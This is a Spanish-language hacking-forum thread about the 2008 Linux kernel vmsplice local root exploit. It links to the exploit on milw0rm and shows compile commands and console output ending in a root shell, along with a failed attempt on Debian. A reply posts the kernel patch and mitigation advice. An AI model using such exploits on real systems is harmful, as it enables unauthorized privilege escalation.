HackCracked
Noviembre 25, 2009, 06:17:44 am *
Bienvenido(a), Visitante. Por favor, ingresa o regístrate.

Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias:
 
  Inicio Ayuda Buscar Ingresar Registrarse  
HackCracked > нacĸzone > вυgѕ y eхploιт > Linux Kernel 2.6 Local Root Exploit
Páginas: [1]
« anterior próximo »
  Imprimir  
Autor Tema: Linux Kernel 2.6 Local Root Exploit  (Leído 83 veces)
DJ_DEXTER
Administrator
Miembro Activo de HackCracked
*****

Lo que haces ahora se vera en el futuro

Karma: 13
Mensajes: 291


Ver Perfil WWW Email
« : Septiembre 29, 2008, 02:24:01 am »
Leemos en Slashdot acerca de la existencia de un exploit que permitiría a un a un usuario hacerse con privilegios de root localmente.

Dicho exploit, y he aquí lo realmente novedoso del asunto, se aprovecharía de un bug presente en la serie 2.6 del Kernel, y que afecta a las versiones comprendidas desde la 2.6.17 hasta 2.6.24.1.

Quienes han descubierto este problema, recomiendan que, si no te fías de tus usuarios, compiles un nuevo kernel, sin vmsplice, que parece ser el origen de este bug.

Esperemos que dentro de muy poco, este desagradable agujero de seguridad este resuelto.

Para amantes del código, aquí podéis echar un vistazo al exploit.

http://www.milw0rm.com/exploits/5092

Código:
    $ gcc exploit.c -o exploit
    $ whoami
    heikki
    $ ./exploit
    -------

    ----------------------------
    Linux vmsplice Local Root Exploit
    By qaaz
    -----------------------------------
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0xb7d90000 .. 0xb7dc2000
    [+] root
    $ whoami
    root

Fuente:
Código:
http://linux.adslzone.net/2008/02/10/linux-kernel-26-local-root-exploit/

Lo probe en Debian 4.0 etch rc3 y no funciona

Código:
dexter4@dexter4:~$ gcc Exploit.c -o Exploit
dexter4@dexter4:~$ whoami
dexter4
dexter4@dexter4:~$ ./Exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] addr: 0xc010f2be
[-] wtf
dexter4@dexter4:~$
dexter4@dexter4:~$ uname -r
2.6.18-6-486


conclusion mi kernel no tiene el bug Sonreir

Saludos!!!
En línea
Mi Deviantart
AnimAlf
Newbie
*

Is the truth out there?

Karma: 1
Mensajes: 5

14100114
Ver Perfil WWW
« Respuesta #1 : Junio 07, 2009, 05:26:45 am »
Hombre, es bug sí, pero igual que descubrieron el bug, luego hicieron el exploit, también apareció el parche ... que eso sí que es ligero para corregirlo:

Código:
--- linux-2.6.orig/fs/splice.c
+++ linux-2.6/fs/splice.c
@@ -1237,6 +1237,9 @@ static int get_iovec_page_array(const st
  if (unlikely(!base))
  break;
 
+ if (unlikely(!access_ok(VERIFY_READ, base, len)))
+ break;
+
  /*
  * Get this base offset and number of pages, then map
  * in the user pages.

Lo normal es que se aplique el parche, en todas las distros ...

En GNU/Linux, tiene que ser muy despistado un Administrador que tenga un bug o exploit, de estas caracteristicas ... si es uno que no actualice el núcleo ... al menos, los parches sí debe controlarlos... pero por los general, las distros, ya los añaden todos.

SaludOS
En línea
En busca del TuXeR perdido
Páginas: [1]
  Imprimir  
« anterior próximo »
 
Ir a:  

Impulsado por MySQL Impulsado por PHP Powered by SMF 1.1.10 | SMF © 2006-2008, Simple Machines LLC
THE MATRIX ONLINE, characters, names and all related indicia are trademarks of and © Warner Bros & S.O.E. Entertainment Inc.
:: The Matrix Online theme by Rumbaar :: 		XHTML 1.0 válido! CSS válido!